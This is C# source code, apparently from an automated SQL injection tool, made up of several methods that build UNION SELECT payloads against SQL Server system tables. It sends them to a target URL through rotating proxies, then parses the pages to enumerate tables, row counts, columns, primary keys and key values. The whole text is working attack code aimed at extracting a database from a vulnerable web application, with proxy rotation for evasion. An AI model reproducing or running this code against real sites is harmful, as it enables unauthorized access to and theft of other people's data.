private GlobalDS.Field GetFieldData(long TableID, int FieldID) { GlobalDS.Field retVal = new GlobalDS.Field(); StringBuilder WhereClause = new StringBuilder(); WhereClause.Append("id=").Append(TableID).Append(" and colid > ").Append(FieldID); _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("name + char(58)+convert(char,xtype)", "syscolumns", WhereClause.ToString()); string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); string PulledData = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin); string[] values = PulledData.Split(':'); retVal.FieldName = values[0]; retVal.DataType = GetSqlDataType(Convert.ToInt64(values[1].Trim())); _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, status)", "sysconstraints", "id=" + TableID + " and colid=" + FieldID); ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); PulledData = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin); if (PulledData.Length > 0) { PulledData = PulledData.Substring(1, PulledData.Length - 1); retVal.IsPrimary = ((Convert.ToInt32(PulledData.Trim()) & 1) == 1); } return(retVal); }
private GlobalDS.Table RetrieveTable(long PreviousTableID) { GlobalDS.Table retVal = new GlobalDS.Table(); _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", "xtype=char(85) and id > " + PreviousTableID.ToString()); string ResultPage, ResultText; ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin); string[] values = ResultText.Split(':'); retVal.Name = values[0]; retVal.ObjectID = Convert.ToInt64(values[1]); _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", values[0], null); ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin); if (ResultText.Length > 0) { ResultText = ResultText.Substring(1, ResultText.Length - 1); retVal.RecordCount = Convert.ToInt64(ResultText.Trim()); } else { retVal.RecordCount = -1; } return(retVal); }
private long GetTableCount() { _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58)+convert(char,count(name))+char(58)", "sysobjects", "xtype=char(85)"); string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); string PulledCount = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin); PulledCount = PulledCount.Substring(1, PulledCount.Length - 2).Trim(); return(Convert.ToInt64(PulledCount)); }
private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType) { StringBuilder WhereClause = new StringBuilder(); if (CurrentPrimaryKey.Name == KeyName) { WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value); } _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString()); string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin); ResultText = ResultText.Substring(1, ResultText.Length - 2); string WorkingText = ""; switch (PrimaryKeyType) { case SqlDbType.VarChar: case SqlDbType.Char: case SqlDbType.NChar: case SqlDbType.NText: case SqlDbType.NVarChar: case SqlDbType.Text: StringBuilder ElementBuilder = new StringBuilder(); //split char[] TextElements = ResultText.ToCharArray(); for (int i = 0; i < TextElements.Length; i++) { ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + "); } ElementBuilder.Remove(ElementBuilder.Length - 2, 2); // remove trailing '+ ' WorkingText = ElementBuilder.ToString(); break; default: WorkingText = ResultText.Trim(); break; } GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey(); retVal.Name = KeyName; retVal.Value = WorkingText; retVal.OutputValue = ResultText; return(retVal); }